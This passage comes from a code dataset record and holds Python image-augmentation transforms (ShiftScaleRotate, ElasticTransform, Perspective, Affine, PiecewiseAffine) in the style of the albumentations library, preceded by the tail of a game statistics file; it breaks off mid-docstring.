buffer\n stats_str_with_buffer = [\n stat_str.format(buffer=buffer_per_line[idx], value=stats_to_report[idx])\n for idx, stat_str in enumerate(self.OUTPUT_STATS_FORMAT)\n ]\n\n return '\\n'.join(stats_str_with_buffer)\n\n\n\nstat_tracker = StatTracker(osc=osc)\n","repo_name":"gloliva/HyperLydian","sub_path":"game/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":22049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"928641809","text":"import math\nimport random\nfrom enum import Enum\nfrom typing import Dict, Optional, Sequence, Tuple, Union\n\nimport cv2\nimport numpy as np\nimport skimage.transform\n\nfrom albumentations.core.bbox_utils import denormalize_bbox, normalize_bbox\n\nfrom ... import random_utils\nfrom ...core.transforms_interface import (\n BoxInternalType,\n DualTransform,\n ImageColorType,\n KeypointInternalType,\n ScaleFloatType,\n to_tuple,\n)\nfrom ..functional import bbox_from_mask\nfrom . import functional as F\n\n__all__ = [\n \"ShiftScaleRotate\",\n \"ElasticTransform\",\n \"Perspective\",\n \"Affine\",\n \"PiecewiseAffine\",\n \"VerticalFlip\",\n \"HorizontalFlip\",\n \"Flip\",\n \"Transpose\",\n \"OpticalDistortion\",\n \"GridDistortion\",\n \"PadIfNeeded\",\n]\n\n\nclass ShiftScaleRotate(DualTransform):\n \"\"\"Randomly apply affine transforms: translate, scale and rotate the input.\n\n Args:\n shift_limit ((float, float) or float): shift factor range for both height and width. If shift_limit\n is a single float value, the range will be (-shift_limit, shift_limit). Absolute values for lower and\n upper bounds should lie in range [0, 1]. Default: (-0.0625, 0.0625).\n scale_limit ((float, float) or float): scaling factor range. If scale_limit is a single float value, the\n range will be (-scale_limit, scale_limit). Note that the scale_limit will be biased by 1.\n If scale_limit is a tuple, like (low, high), sampling will be done from the range (1 + low, 1 + high).\n Default: (-0.1, 0.1).\n rotate_limit ((int, int) or int): rotation range. If rotate_limit is a single int value, the\n range will be (-rotate_limit, rotate_limit). Default: (-45, 45).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n shift_limit_x ((float, float) or float): shift factor range for width. If it is set then this value\n instead of shift_limit will be used for shifting width. If shift_limit_x is a single float value,\n the range will be (-shift_limit_x, shift_limit_x). Absolute values for lower and upper bounds should lie in\n the range [0, 1]. Default: None.\n shift_limit_y ((float, float) or float): shift factor range for height. If it is set then this value\n instead of shift_limit will be used for shifting height. If shift_limit_y is a single float value,\n the range will be (-shift_limit_y, shift_limit_y). Absolute values for lower and upper bounds should lie\n in the range [0, 1]. Default: None.\n rotate_method (str): rotation method used for the bounding boxes. Should be one of \"largest_box\" or \"ellipse\".\n Default: \"largest_box\"\n p (float): probability of applying the transform. 
Default: 0.5.\n\n Targets:\n image, mask, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n shift_limit=0.0625,\n scale_limit=0.1,\n rotate_limit=45,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n shift_limit_x=None,\n shift_limit_y=None,\n rotate_method=\"largest_box\",\n always_apply=False,\n p=0.5,\n ):\n super(ShiftScaleRotate, self).__init__(always_apply, p)\n self.shift_limit_x = to_tuple(shift_limit_x if shift_limit_x is not None else shift_limit)\n self.shift_limit_y = to_tuple(shift_limit_y if shift_limit_y is not None else shift_limit)\n self.scale_limit = to_tuple(scale_limit, bias=1.0)\n self.rotate_limit = to_tuple(rotate_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.rotate_method = rotate_method\n\n if self.rotate_method not in [\"largest_box\", \"ellipse\"]:\n raise ValueError(f\"Rotation method {self.rotate_method} is not valid.\")\n\n def apply(self, img, angle=0, scale=0, dx=0, dy=0, interpolation=cv2.INTER_LINEAR, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img, angle=0, scale=0, dx=0, dy=0, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_keypoint(self, keypoint, angle=0, scale=0, dx=0, dy=0, rows=0, cols=0, **params):\n return F.keypoint_shift_scale_rotate(keypoint, angle, scale, dx, dy, rows, cols)\n\n def get_params(self):\n return {\n \"angle\": random.uniform(self.rotate_limit[0], self.rotate_limit[1]),\n \"scale\": random.uniform(self.scale_limit[0], self.scale_limit[1]),\n \"dx\": random.uniform(self.shift_limit_x[0], self.shift_limit_x[1]),\n \"dy\": random.uniform(self.shift_limit_y[0], self.shift_limit_y[1]),\n }\n\n def apply_to_bbox(self, bbox, angle, scale, dx, dy, **params):\n return F.bbox_shift_scale_rotate(bbox, angle, scale, dx, dy, self.rotate_method, **params)\n\n def get_transform_init_args(self):\n return {\n \"shift_limit_x\": self.shift_limit_x,\n \"shift_limit_y\": self.shift_limit_y,\n \"scale_limit\": to_tuple(self.scale_limit, bias=-1.0),\n \"rotate_limit\": self.rotate_limit,\n \"interpolation\": self.interpolation,\n \"border_mode\": self.border_mode,\n \"value\": self.value,\n \"mask_value\": self.mask_value,\n \"rotate_method\": self.rotate_method,\n }\n\n\nclass ElasticTransform(DualTransform):\n \"\"\"Elastic deformation of images as described in [Simard2003]_ (with modifications).\n Based on https://gist.github.com/ernestum/601cdf56d2b424757de5\n\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n\n Args:\n alpha (float):\n sigma (float): Gaussian filter parameter.\n alpha_affine (float): The range will be (-alpha_affine, alpha_affine)\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. 
Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n approximate (boolean): Whether to smooth displacement map with fixed kernel size.\n Enabling this option gives ~2X speedup on large images.\n same_dxdy (boolean): Whether to use same random generated shift for x and y.\n Enabling this option gives ~2X speedup.\n\n Targets:\n image, mask, bbox\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n alpha=1,\n sigma=50,\n alpha_affine=50,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n always_apply=False,\n approximate=False,\n same_dxdy=False,\n p=0.5,\n ):\n super(ElasticTransform, self).__init__(always_apply, p)\n self.alpha = alpha\n self.alpha_affine = alpha_affine\n self.sigma = sigma\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.approximate = approximate\n self.same_dxdy = same_dxdy\n\n def apply(self, img, random_state=None, interpolation=cv2.INTER_LINEAR, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n interpolation,\n self.border_mode,\n self.value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_mask(self, img, random_state=None, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_bbox(self, bbox, random_state=None, **params):\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.elastic_transform(\n mask,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n )\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def get_params(self):\n return {\"random_state\": random.randint(0, 10000)}\n\n def get_transform_init_args_names(self):\n return (\n \"alpha\",\n \"sigma\",\n \"alpha_affine\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n \"approximate\",\n \"same_dxdy\",\n )\n\n\nclass Perspective(DualTransform):\n \"\"\"Perform a random four point perspective transform of the input.\n\n Args:\n scale (float or (float, float)): standard deviation of the normal distributions. These are used to sample\n the random distances of the subimage's corners from the full image's corners.\n If scale is a single float value, the range will be (0, scale). Default: (0.05, 0.1).\n keep_size (bool): Whether to resize image’s back to their original size after applying the perspective\n transform. If set to False, the resulting images may end up having different shapes\n and will always be a list, never an array. 
Default: True\n pad_mode (OpenCV flag): OpenCV border mode.\n pad_val (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n Default: 0\n mask_pad_val (int, float, list of int, list of float): padding value for mask\n if border_mode is cv2.BORDER_CONSTANT. Default: 0\n fit_output (bool): If True, the image plane size and position will be adjusted to still capture\n the whole image after perspective transformation. (Followed by image resizing if keep_size is set to True.)\n Otherwise, parts of the transformed image may be outside of the image plane.\n This setting should not be set to True when using large scale values as it could lead to very large images.\n Default: False\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n scale=(0.05, 0.1),\n keep_size=True,\n pad_mode=cv2.BORDER_CONSTANT,\n pad_val=0,\n mask_pad_val=0,\n fit_output=False,\n interpolation=cv2.INTER_LINEAR,\n always_apply=False,\n p=0.5,\n ):\n super().__init__(always_apply, p)\n self.scale = to_tuple(scale, 0)\n self.keep_size = keep_size\n self.pad_mode = pad_mode\n self.pad_val = pad_val\n self.mask_pad_val = mask_pad_val\n self.fit_output = fit_output\n self.interpolation = interpolation\n\n def apply(self, img, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective(\n img, matrix, max_width, max_height, self.pad_val, self.pad_mode, self.keep_size, params[\"interpolation\"]\n )\n\n def apply_to_bbox(self, bbox, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_bbox(bbox, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size)\n\n def apply_to_keypoint(self, keypoint, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_keypoint(\n keypoint, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n scale = random_utils.uniform(*self.scale)\n points = random_utils.normal(0, scale, [4, 2])\n points = np.mod(np.abs(points), 1)\n\n # top left -- no changes needed, just use jitter\n # top right\n points[1, 0] = 1.0 - points[1, 0] # w = 1.0 - jitter\n # bottom right\n points[2] = 1.0 - points[2] # w = 1.0 - jitt\n # bottom left\n points[3, 1] = 1.0 - points[3, 1] # h = 1.0 - jitter\n\n points[:, 0] *= w\n points[:, 1] *= h\n\n # Obtain a consistent order of the points and unpack them individually.\n # Warning: don't just do (tl, tr, br, bl) = _order_points(...)\n # here, because the reordered points is used further below.\n points = self._order_points(points)\n tl, tr, br, bl = points\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n min_width = None\n max_width = None\n while min_width is None or min_width < 2:\n width_top = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n width_bottom = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n max_width = int(max(width_top, width_bottom))\n min_width = int(min(width_top, width_bottom))\n if min_width < 2:\n step_size = (2 - min_width) / 2\n tl[0] -= step_size\n tr[0] += step_size\n bl[0] -= step_size\n br[0] += step_size\n\n # compute the height of the new image, which 
will be the maximum distance between the top-right\n # and bottom-right y-coordinates or the top-left and bottom-left y-coordinates\n min_height = None\n max_height = None\n while min_height is None or min_height < 2:\n height_right = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n height_left = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n max_height = int(max(height_right, height_left))\n min_height = int(min(height_right, height_left))\n if min_height < 2:\n step_size = (2 - min_height) / 2\n tl[1] -= step_size\n tr[1] -= step_size\n bl[1] += step_size\n br[1] += step_size\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left order\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n dst = np.array([[0, 0], [max_width, 0], [max_width, max_height], [0, max_height]], dtype=np.float32)\n\n # compute the perspective transform matrix and then apply it\n m = cv2.getPerspectiveTransform(points, dst)\n\n if self.fit_output:\n m, max_width, max_height = self._expand_transform(m, (h, w))\n\n return {\"matrix\": m, \"max_height\": max_height, \"max_width\": max_width, \"interpolation\": self.interpolation}\n\n @classmethod\n def _expand_transform(cls, matrix, shape):\n height, width = shape\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2, max_height\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n rect = np.array([[0, 0], [width, 0], [width, height], [0, height]], dtype=np.float32)\n dst = cv2.perspectiveTransform(np.array([rect]), matrix)[0]\n\n # get min x, y over transformed 4 points\n # then modify target points by subtracting these minima => shift to (0, 0)\n dst -= dst.min(axis=0, keepdims=True)\n dst = np.around(dst, decimals=0)\n\n matrix_expanded = cv2.getPerspectiveTransform(rect, dst)\n max_width, max_height = dst.max(axis=0)\n return matrix_expanded, int(max_width), int(max_height)\n\n @staticmethod\n def _order_points(pts: np.ndarray) -> np.ndarray:\n pts = np.array(sorted(pts, key=lambda x: x[0]))\n left = pts[:2] # points with smallest x coordinate - left points\n right = pts[2:] # points with greatest x coordinate - right points\n\n if left[0][1] < left[1][1]:\n tl, bl = left\n else:\n bl, tl = left\n\n if right[0][1] < right[1][1]:\n tr, br = right\n else:\n br, tr = right\n\n return np.array([tl, tr, br, bl], dtype=np.float32)\n\n def get_transform_init_args_names(self):\n return \"scale\", \"keep_size\", \"pad_mode\", \"pad_val\", \"mask_pad_val\", \"fit_output\", \"interpolation\"\n\n\nclass Affine(DualTransform):\n \"\"\"Augmentation to apply affine transformations to images.\n This is mostly a wrapper around the corresponding classes and functions in OpenCV.\n\n Affine transformations involve:\n\n - Translation (\"move\" image on the x-/y-axis)\n - Rotation\n - Scaling (\"zoom\" in/out)\n - Shear (move one side of the image, turning a square into a trapezoid)\n\n All such transformations can create \"new\" pixels in the image without a defined content, e.g.\n if the image is translated to the left, pixels are created on the right.\n A method has to be defined to deal with these pixel values.\n The parameters `cval` and `mode` of this class deal with this.\n\n Some transformations involve interpolations between several 
pixels\n of the input image to generate output pixel values. The parameters `interpolation` and\n `mask_interpolation` deals with the method of interpolation used for this.\n\n Args:\n scale (number, tuple of number or dict): Scaling factor to use, where ``1.0`` denotes \"no change\" and\n ``0.5`` is zoomed out to ``50`` percent of the original size.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That the same range will be used for both x- and y-axis. To keep the aspect ratio, set\n ``keep_ratio=True``, then the same value will be used for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes. Note that when\n the ``keep_ratio=True``, the x- and y-axis ranges should be the same.\n translate_percent (None, number, tuple of number or dict): Translation as a fraction of the image height/width\n (x-translation, y-translation), where ``0`` denotes \"no change\"\n and ``0.5`` denotes \"half of the axis size\".\n * If ``None`` then equivalent to ``0.0`` unless `translate_px` has a value other than ``None``.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That sampled fraction value will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n translate_px (None, int, tuple of int or dict): Translation in pixels.\n * If ``None`` then equivalent to ``0`` unless `translate_percent` has a value other than ``None``.\n * If a single int, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from\n the discrete interval ``[a..b]``. That number will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n rotate (number or tuple of number): Rotation in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``. Rotation happens around the *center* of the image,\n not the top left corner as in some other frameworks.\n * If a number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``\n and used as the rotation value.\n shear (number, tuple of number or dict): Shear in degrees (**NOT** radians), i.e. 
expected value range is\n around ``[-360, 360]``, with reasonable values being in the range of ``[-45, 45]``.\n * If a number, then that value will be used for all images as\n the shear on the x-axis (no shear on the y-axis will be done).\n * If a tuple ``(a, b)``, then two value will be uniformly sampled per image\n from the interval ``[a, b]`` and be used as the x- and y-shear value.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n interpolation (int): OpenCV interpolation flag.\n mask_interpolation (int): OpenCV interpolation flag.\n cval (number or sequence of number): The constant value to use when filling in newly created pixels.\n (E.g. translating by 1px to the right will create a new 1px-wide column of pixels\n on the left of the image).\n The value is only used when `mode=constant`. The expected value range is ``[0, 255]`` for ``uint8`` images.\n cval_mask (number or tuple of number): Same as cval but only for masks.\n mode (int): OpenCV border flag.\n fit_output (bool): If True, the image plane size and position will be adjusted to tightly capture\n the whole image after affine transformation (`translate_percent` and `translate_px` are ignored).\n Otherwise (``False``), parts of the transformed image may end up outside the image plane.\n Fitting the output shape can be useful to avoid corners of the image being outside the image plane\n after applying rotations. Default: False\n keep_ratio (bool): When True, the original aspect ratio will be kept when the random scale is applied.\n Default: False.\n rotate_method (str): rotation method used for the bounding boxes. Should be one of \"largest_box\" or\n \"ellipse\"[1].\n Default: \"largest_box\"\n p (float): probability of applying the transform. 
Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n Reference:\n [1] https://arxiv.org/abs/2109.13488\n \"\"\"\n\n def __init__(\n self,\n scale: Optional[Union[float, Sequence[float], dict]] = None,\n translate_percent: Optional[Union[float, Sequence[float], dict]] = None,\n translate_px: Optional[Union[int, Sequence[int], dict]] = None,\n rotate: Optional[Union[float, Sequence[float]]] = None,\n shear: Optional[Union[float, Sequence[float], dict]] = None,\n interpolation: int = cv2.INTER_LINEAR,\n mask_interpolation: int = cv2.INTER_NEAREST,\n cval: Union[int, float, Sequence[int], Sequence[float]] = 0,\n cval_mask: Union[int, float, Sequence[int], Sequence[float]] = 0,\n mode: int = cv2.BORDER_CONSTANT,\n fit_output: bool = False,\n keep_ratio: bool = False,\n rotate_method: str = \"largest_box\",\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super().__init__(always_apply=always_apply, p=p)\n\n params = [scale, translate_percent, translate_px, rotate, shear]\n if all([p is None for p in params]):\n scale = {\"x\": (0.9, 1.1), \"y\": (0.9, 1.1)}\n translate_percent = {\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)}\n rotate = (-15, 15)\n shear = {\"x\": (-10, 10), \"y\": (-10, 10)}\n else:\n scale = scale if scale is not None else 1.0\n rotate = rotate if rotate is not None else 0.0\n shear = shear if shear is not None else 0.0\n\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.scale = self._handle_dict_arg(scale, \"scale\")\n self.translate_percent, self.translate_px = self._handle_translate_arg(translate_px, translate_percent)\n self.rotate = to_tuple(rotate, rotate)\n self.fit_output = fit_output\n self.shear = self._handle_dict_arg(shear, \"shear\")\n self.keep_ratio = keep_ratio\n self.rotate_method = rotate_method\n\n if self.keep_ratio and self.scale[\"x\"] != self.scale[\"y\"]:\n raise ValueError(\n \"When keep_ratio is True, the x and y scale range should be identical. got {}\".format(self.scale)\n )\n\n def get_transform_init_args_names(self):\n return (\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"mode\",\n \"scale\",\n \"translate_percent\",\n \"translate_px\",\n \"rotate\",\n \"fit_output\",\n \"shear\",\n \"cval_mask\",\n \"keep_ratio\",\n \"rotate_method\",\n )\n\n @staticmethod\n def _handle_dict_arg(val: Union[float, Sequence[float], dict], name: str, default: float = 1.0):\n if isinstance(val, dict):\n if \"x\" not in val and \"y\" not in val:\n raise ValueError(\n f'Expected {name} dictionary to contain at least key \"x\" or ' 'key \"y\". 
Found neither of them.'\n )\n x = val.get(\"x\", default)\n y = val.get(\"y\", default)\n return {\"x\": to_tuple(x, x), \"y\": to_tuple(y, y)}\n return {\"x\": to_tuple(val, val), \"y\": to_tuple(val, val)}\n\n @classmethod\n def _handle_translate_arg(\n cls,\n translate_px: Optional[Union[float, Sequence[float], dict]],\n translate_percent: Optional[Union[float, Sequence[float], dict]],\n ):\n if translate_percent is None and translate_px is None:\n translate_px = 0\n\n if translate_percent is not None and translate_px is not None:\n raise ValueError(\n \"Expected either translate_percent or translate_px to be \" \"provided, \" \"but neither of them was.\"\n )\n\n if translate_percent is not None:\n # translate by percent\n return cls._handle_dict_arg(translate_percent, \"translate_percent\", default=0.0), translate_px\n\n if translate_px is None:\n raise ValueError(\"translate_px is None.\")\n # translate by pixels\n return translate_percent, cls._handle_dict_arg(translate_px, \"translate_px\")\n\n def apply(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = (),\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.interpolation,\n cval=self.cval,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_mask(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = (),\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.mask_interpolation,\n cval=self.cval_mask,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n matrix: skimage.transform.ProjectiveTransform = None,\n rows: int = 0,\n cols: int = 0,\n output_shape: Sequence[int] = (),\n **params\n ) -> BoxInternalType:\n return F.bbox_affine(bbox, matrix, self.rotate_method, rows, cols, output_shape)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n matrix: Optional[skimage.transform.ProjectiveTransform] = None,\n scale: Optional[dict] = None,\n **params\n ) -> KeypointInternalType:\n assert scale is not None and matrix is not None\n return F.keypoint_affine(keypoint, matrix=matrix, scale=scale)\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params: dict) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n translate: Dict[str, Union[int, float]]\n if self.translate_px is not None:\n translate = {key: random.randint(*value) for key, value in self.translate_px.items()}\n elif self.translate_percent is not None:\n translate = {key: random.uniform(*value) for key, value in self.translate_percent.items()}\n translate[\"x\"] = translate[\"x\"] * w\n translate[\"y\"] = translate[\"y\"] * h\n else:\n translate = {\"x\": 0, \"y\": 0}\n\n # Look to issue https://github.com/albumentations-team/albumentations/issues/1079\n shear = {key: -random.uniform(*value) for key, value in self.shear.items()}\n scale = {key: random.uniform(*value) for key, value in self.scale.items()}\n if self.keep_ratio:\n scale[\"y\"] = scale[\"x\"]\n\n # Look to issue https://github.com/albumentations-team/albumentations/issues/1079\n rotate = -random.uniform(*self.rotate)\n\n # for images we use additional shifts of (0.5, 0.5) as otherwise\n # we get an ugly black border for 90deg rotations\n shift_x = w / 2 - 0.5\n shift_y = h / 2 - 0.5\n\n matrix_to_topleft = skimage.transform.SimilarityTransform(translation=[-shift_x, 
-shift_y])\n matrix_shear_y_rot = skimage.transform.AffineTransform(rotation=-np.pi / 2)\n matrix_shear_y = skimage.transform.AffineTransform(shear=np.deg2rad(shear[\"y\"]))\n matrix_shear_y_rot_inv = skimage.transform.AffineTransform(rotation=np.pi / 2)\n matrix_transforms = skimage.transform.AffineTransform(\n scale=(scale[\"x\"], scale[\"y\"]),\n translation=(translate[\"x\"], translate[\"y\"]),\n rotation=np.deg2rad(rotate),\n shear=np.deg2rad(shear[\"x\"]),\n )\n matrix_to_center = skimage.transform.SimilarityTransform(translation=[shift_x, shift_y])\n matrix = (\n matrix_to_topleft\n + matrix_shear_y_rot\n + matrix_shear_y\n + matrix_shear_y_rot_inv\n + matrix_transforms\n + matrix_to_center\n )\n if self.fit_output:\n matrix, output_shape = self._compute_affine_warp_output_shape(matrix, params[\"image\"].shape)\n else:\n output_shape = params[\"image\"].shape\n\n return {\n \"rotate\": rotate,\n \"scale\": scale,\n \"matrix\": matrix,\n \"output_shape\": output_shape,\n }\n\n @staticmethod\n def _compute_affine_warp_output_shape(\n matrix: skimage.transform.ProjectiveTransform, input_shape: Sequence[int]\n ) -> Tuple[skimage.transform.ProjectiveTransform, Sequence[int]]:\n height, width = input_shape[:2]\n\n if height == 0 or width == 0:\n return matrix, input_shape\n\n # determine shape of output image\n corners = np.array([[0, 0], [0, height - 1], [width - 1, height - 1], [width - 1, 0]])\n corners = matrix(corners)\n minc = corners[:, 0].min()\n minr = corners[:, 1].min()\n maxc = corners[:, 0].max()\n maxr = corners[:, 1].max()\n out_height = maxr - minr + 1\n out_width = maxc - minc + 1\n if len(input_shape) == 3:\n output_shape = np.ceil((out_height, out_width, input_shape[2]))\n else:\n output_shape = np.ceil((out_height, out_width))\n output_shape_tuple = tuple([int(v) for v in output_shape.tolist()])\n # fit output image in new shape\n translation = (-minc, -minr)\n matrix_to_fit = skimage.transform.SimilarityTransform(translation=translation)\n matrix = matrix + matrix_to_fit\n return matrix, output_shape_tuple\n\n\nclass PiecewiseAffine(DualTransform):\n \"\"\"Apply affine transformations that differ between local neighbourhoods.\n This augmentation places a regular grid of points on an image and randomly moves the neighbourhood of these point\n around via affine transformations. This leads to local distortions.\n\n This is mostly a wrapper around scikit-image's ``PiecewiseAffine``.\n See also ``Affine`` for a similar technique.\n\n Note:\n This augmenter is very slow. 
Try to use ``ElasticTransformation`` instead, which is at least 10x faster.\n\n Note:\n For coordinate-based inputs (keypoints, bounding boxes, polygons, ...),\n this augmenter still has to perform an image-based augmentation,\n which will make it significantly slower and not fully correct for such inputs than other transforms.\n\n Args:\n scale (float, tuple of float): Each point on the regular grid is moved around via a normal distribution.\n This scale factor is equivalent to the normal distribution's sigma.\n Note that the jitter (how far each point is moved in which direction) is multiplied by the height/width of\n the image if ``absolute_scale=False`` (default), so this scale can be the same for different sized images.\n Recommended values are in the range ``0.01`` to ``0.05`` (weak to strong augmentations).\n * If a single ``float``, then that value will always be used as the scale.\n * If a tuple ``(a, b)`` of ``float`` s, then a random value will\n be uniformly sampled per image from the interval ``[a, b]``.\n nb_rows (int, tuple of int): Number of rows of points that the regular grid should have.\n Must be at least ``2``. For large images, you might want to pick a higher value than ``4``.\n You might have to then adjust scale to lower values.\n * If a single ``int``, then that value will always be used as the number of rows.\n * If a tuple ``(a, b)``, then a value from the discrete interval\n ``[a..b]`` will be uniformly sampled per image.\n nb_cols (int, tuple of int): Number of columns. Analogous to `nb_rows`.\n interpolation (int): The order of interpolation. The order has to be in the range 0-5:\n - 0: Nearest-neighbor\n - 1: Bi-linear (default)\n - 2: Bi-quadratic\n - 3: Bi-cubic\n - 4: Bi-quartic\n - 5: Bi-quintic\n mask_interpolation (int): same as interpolation but for mask.\n cval (number): The constant value to use when filling in newly created pixels.\n cval_mask (number): Same as cval but only for masks.\n mode (str): {'constant', 'edge', 'symmetric', 'reflect', 'wrap'}, optional\n Points outside the boundaries of the input are filled according\n to the given mode. Modes match the behaviour of `numpy.pad`.\n absolute_scale (bool): Take `scale` as an absolute value rather than a relative value.\n keypoints_threshold (float): Used as threshold in 